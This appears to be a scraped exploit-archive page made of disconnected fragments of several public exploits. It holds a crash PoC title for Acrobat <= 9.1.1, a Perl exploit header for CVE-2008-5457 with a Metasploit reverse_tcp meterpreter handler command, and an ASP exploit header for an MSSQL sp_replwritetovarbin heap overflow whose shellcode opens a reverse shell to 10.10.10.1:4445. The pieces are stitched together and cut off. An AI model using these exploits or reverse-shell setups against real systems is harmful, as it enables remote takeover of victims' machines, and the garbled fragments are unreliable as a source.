Acrobat <= 9.1.1 Stack Overflow Crashy PoC

http://milw0rm.com/sploits/2009-crashy_the_clown.pdf

# milw0rm.com [2009-05-29]

From: milw0rm

#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E
# [*] Please wait while we load the module tree...
# [*] Handler binding to LHOST 0.0.0.0 


From: milw0rm

<html>
<%
// k`sOSe 12/17/2008
// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
// the change allows multiple shots :)
//  
